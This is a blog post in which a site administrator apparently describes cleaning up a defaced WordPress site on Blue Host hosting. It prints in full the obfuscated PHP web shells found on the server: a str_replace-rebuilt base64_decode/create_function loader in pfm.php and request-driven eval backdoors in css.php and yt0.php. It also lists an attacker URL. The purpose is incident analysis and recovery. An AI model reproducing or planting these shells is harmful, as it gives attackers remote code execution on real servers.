Hacked By Muslim Hacker, Hacked By BLEİSY

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

A customer site got hacked today. Blue Host, shared service. WP core, plugins, themes all current.

They hacked the index.php on the public_html dir, and had malware code in the replaced index.php, along with 2 extra files. Front page was defaced, but site was left intact.

added files: 9e09ad (data file) and pfm.php (had php code) Here’s the pfm.php code:

<?php
$or=”cIEBldcm”;
$lq=”9TVFsn”;
$avj = str_replace(“j”,””,”sjtrj_jrjejpljajcje”);
$zs=”FsKCRfUE”;
$bu=”Y21kJ10pOw==”;
$qu = $avj(“i”, “”, “ibiaisie6i4i_dieicoide”);
$fh = $avj(“k”,””,”crkekatkek_kfkukncktkikon”);
$hwy = $fh(”, $qu($avj(“c”, “”, $or.$zs.$lq.$bu))); $hwy();
?>

The hack message used a broken image: http://img.webme.com/pic/f/fbmlkodarsiv/dalgalanan-bayrak.jpg

Blue Host said that the theme allowed file injection, so I checked the theme with the source, and it was pretty close to identical. I could not tell if WordPress was the vector. They replaced the theme, “Lighthouse”, with the 2017 theme and the data seems good. I need to check this more.

I found the hacked index.php file on the malwaredecoder site, and again

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

They referenced a unique URL: http://jnice01.ouuwtizhy563nskt/weilai0.php

and also this line: yumingid=167

Both sound Chinese. weilai means “future”, as in future use.

In the theme directory I found some odd files, which should not be there:
404.php referenced some odd php
AWG.php unrenderable characters, hack file

css.php

<?php echo ‘2018’.’2019′; if (isset($_REQUEST[‘e’])) { $e = $_REQUEST[‘e’]; $arr = array($_POST[‘w0w’],); array_filter($arr, $e); }?>

yt0.php

<?php $a=str_replace(‘x’,”,’axsxxxsexrxtx’);$b=$_POST;@$a($b[yt]);?>

yt9.php big hack file

No other files seem touched. WordPress was not breached, but the account was.

Found very little on Google about this hacker.

Compared hacked theme with newly downloaded version from author and did not see much substantial difference, but when I tried to reinstall the old theme, got the hack back. Then changed back to 2017 and was Ok. Removed hacked theme from site, replaced with newly downloaded one and installed. That seemed to work ok.

Blue Host is having some issues, as the web site has a 15-20 sec delay in response time.

Leave a Reply

Your email address will not be published. Required fields are marked *